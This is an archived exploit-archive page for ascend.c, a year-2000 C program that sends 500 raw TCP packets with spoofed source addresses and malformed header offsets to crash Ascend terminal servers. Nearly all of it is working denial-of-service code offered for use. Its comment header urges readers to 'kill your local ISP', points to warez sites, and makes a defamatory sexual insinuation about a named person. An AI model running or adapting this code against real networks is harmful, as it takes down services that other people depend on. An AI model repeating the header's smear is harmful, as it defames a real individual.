what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ascend.c

ascend.c
Posted May 23, 2000
Authored by The Posse | Site hack.co.za

Ascend remote denial of service - Upon receiving a packet with non zero length tcp offsets ascend terminal servers will crash. Linux based exploit included.

tags | exploit, remote, denial of service, tcp
systems | linux
SHA-256 | 1c9d5ce7aadfbcbc5a0f59fb1a4d4366d8f996bd3022ebe70ecda1d75003f9cf

ascend.c

Change Mirror Download
/*
The Posse Brings you:

The Linux Ascend Kill Program!

Kill your local ISP (or even non-local)

313373133731337313373133731337313373133731337313373133731337313373133731337
1 3
3 1
3 Because Ascend has such a strong programming department that would 3
7 never under any circumstances release a version of their code which 3
3 contained a bug. 7
1 3
3 Well. Ascend did it again. Those pesky non zero length tcp offset's 1
3 do it everytime! Are those fault lights available in christmas colors 3
7 in time for the season? h0h0h0.. 3
3 7
1 BTW, if anyone has any pictures of MSN pops, please post them to 3
3 someplace public so we can all share in the season spirit. 1
3 3
7 - The Posse is back! 3
3 7
1 greetz to : alpha bits, the grave digger, and fast freddy. 3
3 1
3 Goto our eleet ftp sitez: 3
7 3
3 7
1 The Dark Dungeon 198.34.1xx.xxx 600 gigz online! 3
3 Strobe Room 34.101.1xx.xxx 1TB of Warez and H/P/V/A/C/K text 1
3 3
731337313373133731337313373133731337313373133731337313373133731337313373133
3 7
1 2600.com is run off vnetmax.villagenet.com (205.136.35.3) 3
3 Keep your support of 2600, help Emmanuel play with his little boys 1
3 3
731337313373133731337313373133731337313373133731337313373133731337313373133
3

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
#include <netdb.h>

unsigned short compute_tcp_checksum(struct tcphdr *th, int len,
unsigned long saddr, unsigned long daddr)
{
unsigned long sum;
__asm__("
addl %%ecx, %%ebx
adcl %%edx, %%ebx
adcl $0, %%ebx
"
: "=b"(sum)
: "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256)
: "bx", "cx", "dx" );
__asm__("
movl %%ecx, %%edx
cld
cmpl $32, %%ecx
jb 2f
shrl $5, %%ecx
clc
1: lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
loop 1b
adcl $0, %%ebx
movl %%edx, %%ecx
2: andl $28, %%ecx
je 4f
shrl $2, %%ecx
clc
3: lodsl
adcl %%eax, %%ebx
loop 3b
adcl $0, %%ebx
4: movl $0, %%eax
testw $2, %%dx
je 5f
lodsw
addl %%eax, %%ebx
adcl $0, %%ebx
movw $0, %%ax
5: test $1, %%edx
je 6f
lodsb
addl %%eax, %%ebx
adcl $0, %%ebx
6: movl %%ebx, %%eax
shrl $16, %%eax
addw %%ax, %%bx
adcw $0, %%bx
"
: "=b"(sum)
: "0"(sum), "c"(len), "S"(th)
: "ax", "bx", "cx", "dx", "si" );
return((~sum) & 0xffff);
}

#define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) )
#define tcp_offset ( sizeof(struct iphdr) )
#define err(x) { fprintf(stderr, x); exit(1); }
#define errors(x, y) { fprintf(stderr, x, y); exit(1); }
struct iphdr temp_ip;
int temp_socket = 0;

u_short
ip_checksum (u_short * buf, int nwords)
{
unsigned long sum;

for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}

void
fixhost (struct sockaddr_in *addr, char *hostname)
{
struct sockaddr_in *address;
struct hostent *host;

address = (struct sockaddr_in *) addr;
(void) bzero ((char *) address, sizeof (struct sockaddr_in));
address->sin_family = AF_INET;
address->sin_addr.s_addr = inet_addr (hostname);
if ((int) address->sin_addr.s_addr == -1)
{
host = gethostbyname (hostname);
if (host)
{
bcopy (host->h_addr, (char *) &address->sin_addr,
host->h_length);
}
else
{
puts ("Couldn't resolve address!!!");
exit (-1);
}
}
}

unsigned int
lookup (host)
char *host;
{
unsigned int addr;
struct hostent *he;

addr = inet_addr (host);
if (addr == -1)
{
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;

bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
}
return (addr);
}

unsigned short
lookup_port (p)
char *p;
{
int i;
struct servent *s;

if ((i = atoi (p)) == 0)
{
if ((s = getservbyname (p, "tcp")) == NULL)
errors ("Unknown port %s\n", p);
i = ntohs (s->s_port);
}
return ((unsigned short) i);
}

void
spoof_packet (struct sockaddr_in local, int fromport, \
struct sockaddr_in remote, int toport, ulong sequence, \
int sock, u_char theflag, ulong acknum, \
char *packdata, int datalen)
{
char *packet;
int tempint;
if (datalen > 0)
datalen++;
packet = (char *) malloc (psize + datalen);
tempint = toport;
toport = fromport;
fromport = tempint;
{
struct tcphdr *fake_tcp;
fake_tcp = (struct tcphdr *) (packet + tcp_offset);
fake_tcp->th_dport = htons (fromport);
fake_tcp->th_sport = htons (toport);
fake_tcp->th_flags = theflag;
fake_tcp->th_seq = random ();
fake_tcp->th_ack = random ();
/* this is what really matters, however we randomize everything else
to prevent simple rule based filters */
fake_tcp->th_off = random ();
fake_tcp->th_win = random ();
fake_tcp->th_urp = random ();
}
if (datalen > 0)
{
char *tempbuf;
tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr));
for (tempint = 0; tempint < datalen - 1; tempint++)
{
*tempbuf = *packdata;
*tempbuf++;
*packdata++;
}
*tempbuf = '\r';
}
{
struct iphdr *real_ip;
real_ip = (struct iphdr *) packet;
real_ip->version = 4;
real_ip->ihl = 5;
real_ip->tot_len = htons (psize + datalen);
real_ip->tos = 0;
real_ip->ttl = 64;
real_ip->protocol = 6;
real_ip->check = 0;
real_ip->id = 10786;
real_ip->frag_off = 0;
bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));
bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));
temp_ip.saddr = htonl (ntohl (real_ip->daddr));
real_ip->daddr = htonl (ntohl (real_ip->saddr));
real_ip->saddr = temp_ip.saddr;
real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
{
struct tcphdr *another_tcp;
another_tcp = (struct tcphdr *) (packet + tcp_offset);
another_tcp->th_sum = 0;
another_tcp->th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen,
real_ip->saddr, real_ip->daddr);
}
}
{
int result;
sock = (int) temp_socket;
result = sendto (sock, packet, psize + datalen, 0,
(struct sockaddr *) &remote, sizeof (remote));
}
free (packet);
}

void
main (argc, argv)
int argc;
char **argv;
{
unsigned int daddr;
unsigned short dport;
struct sockaddr_in sin;
int s, i;
struct sockaddr_in local, remote;
u_long start_seq = 4935835 + getpid ();

if (argc != 3)
errors ("Usage: %s <dest_addr> <dest_port>\n\nDest port of 23 for Ascend units.\n",
argv[0]);

if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if (!(daddr = lookup (argv[1])))
err ("Unable to lookup destination address.\n");
dport = lookup_port (argv[2]);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = daddr;
sin.sin_port = dport;
fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1]);
fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[1]);
/* 500 seems to be enough to kill it */
for (i = 0; i < 500; i++)
{
start_seq++;
local.sin_addr.s_addr = random ();
spoof_packet (local, random (), remote, dport, start_seq, (int) s,
TH_SYN | TH_RST | TH_ACK, 0, NULL, 0);
}
}
/* www.hack.co.za [14 May]*/
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close